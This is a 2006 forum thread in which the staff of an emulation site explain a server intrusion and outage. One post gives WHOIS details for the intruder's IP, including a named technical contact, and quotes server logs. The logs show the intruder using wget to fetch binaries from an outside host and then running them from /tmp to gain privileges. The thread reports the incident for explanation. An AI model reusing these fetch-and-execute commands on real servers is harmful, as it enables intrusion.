Alpha Posted April 11, 2006 Share Posted April 11, 2006 Sorry for the 1 day downtime; we had some hacker trouble yesterday afternoon. Apparently they thought they were smart enough to overtake the entire server, but they had no idea who they were messing with. There shouldn't be anymore downtime for a while as we have patched up the server. Currently, we are hoping in getting our own dedicated server, but we're short on money. If you can DONATE, that would be much appreciated. Regards,1Emulation Staff »» Donate to 1Emulation Servers Link to comment Share on other sites More sharing options...
sammaz Posted April 11, 2006 Share Posted April 11, 2006 wtf who has a beef with 1 emu? Link to comment Share on other sites More sharing options...
garyoak99 Posted April 11, 2006 Share Posted April 11, 2006 Thanks for the update! I'm just glad the forum is back! Link to comment Share on other sites More sharing options...
someboddy Posted April 11, 2006 Share Posted April 11, 2006 wtf who has a beef with 1 emu? <{POST_SNAPBACK}> We are not sure the attack was against 1Emulation. There are other sites on this server. Link to comment Share on other sites More sharing options...
Alpha Posted April 11, 2006 Author Share Posted April 11, 2006 wtf who has a beef with 1 emu? We are not sure the attack was against 1Emulation. There are other sites on this server.From the looks of it, we were affected the worst. So it could have very well been us, but we won't be able to know for certain. Link to comment Share on other sites More sharing options...
Weirdy Posted April 11, 2006 Share Posted April 11, 2006 (edited) Was it some kind of F5 terrorist? Perhaps it could've been our good ol' friend Eugene. Edited April 11, 2006 by Weirdy Link to comment Share on other sites More sharing options...
fischju Posted April 11, 2006 Share Posted April 11, 2006 Did you ban any1 recently that seemed 1337 in anyway? And F5 is old...i like to find files hosted on a server and download and delete them with a script and leave it on overnight.....not that I would do that to you guys.....just saying Link to comment Share on other sites More sharing options...
Alpha Posted April 11, 2006 Author Share Posted April 11, 2006 Did you ban any1 recently that seemed 1337 in anyway? And F5 is old...i like to find files hosted on a server and download and delete them with a script and leave it on overnight.....not that I would do that to you guys.....just sayingI haven't banned anyone since January. And I haven't a sign of the guy I banned anywhere. He didn't seem 1337 either, only a proxy-tard. Link to comment Share on other sites More sharing options...
miskie Posted April 11, 2006 Share Posted April 11, 2006 Hacker report : The hacker's LAst IP address before getting into the server was 147.46.127.205 this is the data I can pull on it.. # ENGLISH KRNIC is not an ISP but a National Internet Registry similar to APNIC. The followings is organization information that is using the IPv4 address. IPv4 Address : 147.46.0.0-147.46.255.255 Network Name : NET-SNU Registration Date : 20040625 Publishes : Y [ Organization Information ] Organization ID : ORG384075 Org Name : Seoul National University Address : Sillim9-dong, Gwanak-gu, Seoul Detail address : San56-1Beonji Jungangjeonsanwon Zip Code : 151-742 [ Technical Contact Information ] Name : Eunjoo Jung Org Name : Seoul National University Address : Sillim9-dong, Gwanak-gu, Seoul Detail address : San56-1Beonji Jungangjeonsanwon Zip Code : 151-742 Phone : +82-2-880-5380 E-Mail : ********@plaza.snu.ac.kr once they got in thru this exploit http://www.google.com/search?hl=en&q=Psych...G=Google+Search their IP became 127.0.0.1 and their username apache.. heres some log data of what they did once inside, pretending to be apache -- here the user is downloading crap into the servers TMP folder.. --16:51:24-- http://xpl.netmisphere2.com/r0nin => `r0nin' Resolving xpl.netmisphere2.com... done. Connecting to xpl.netmisphere2.com[82.237.120.143]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,258 [application/x-executable] 0K.................. 100% 45.98 KB/s 16:51:25 (45.98 KB/s) - `r0nin' saved [19258/19258] and here is some other stuff they ran before I caught them finger cd /tpm cd /tmp wget http://xpl.netmisphere2.com/brk2 chmod 777 brk2 ./brk2 wget http://xpl.netmisphere2.com/uselib24 chmod 777 uselib24 ./uselib24 ./uselib24 id ./uselib24 Though this looks bad, this kind of hack is more of a PITA than a security-threatening one - they disrupted the server and apparantly banged the hell out of 1emulation's database -- I cant be sure if it was directed or not (since once they were in they 'became' apache -- which the server doesnt see as a threat. ) at 1emulation specifically, or if this site was just chosen at random. anyway, all the code has been deleted, the exploits have been plugged. Ive been watching the server for the last couple of hours and there is nothing going on of interest at all. Link to comment Share on other sites More sharing options...
Agozer Posted April 11, 2006 Share Posted April 11, 2006 Well, things are back to normal. Let's resume our daily forum activities. Link to comment Share on other sites More sharing options...
CJ Jackson Posted April 11, 2006 Share Posted April 11, 2006 That explains the earlier MySQL error "Too Many Connections", this is just criminal. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now